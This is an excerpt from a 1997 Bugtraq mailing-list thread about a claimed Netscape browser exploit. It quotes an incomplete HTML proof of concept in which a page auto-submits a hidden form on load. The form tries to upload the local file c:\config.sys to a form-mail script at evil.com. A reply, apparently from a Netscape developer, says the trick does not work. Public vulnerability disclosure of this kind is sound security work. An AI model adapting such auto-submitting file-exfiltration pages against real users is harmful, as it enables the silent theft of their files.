Lucky Green wrote:
Approved-By: aleph1@UNDERGROUND.ORG Date: Sat, 14 Jun 1997 19:21:30 -0500 Reply-To: root <root@BACKWATER.PBX.ORG> Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG> From: root <root@BACKWATER.PBX.ORG> Subject: Netscape Exploit To: BUGTRAQ@NETSPACE.ORG
Here is a sample it isn't complete but you get the basic idea of what is going on <HTML><HEAD><TITLE>Evil-DOT-COM Homepage</TITLE><HEAD>
<BODY onLoad="daForm.submit()"> <FORM NAME="daForm" ACTION="http://evil.com/cgi-bin/formmail.pl" METHOD=POST>
<INPUT TYPE=FILE VALUE="c:\config.sys" Name="Save This Document on your Harddrive"> <INPUT TYPE=HIDDEN NAME="recipient" value="foobar@evil.com">
Yeah, that's pretty cool. Too bad it doesn't work. -- What is appropriate for the master is not appropriate| Tom Weinstein for the novice. You must understand Tao before | tomw@netscape.com transcending structure. -- The Tao of Programming |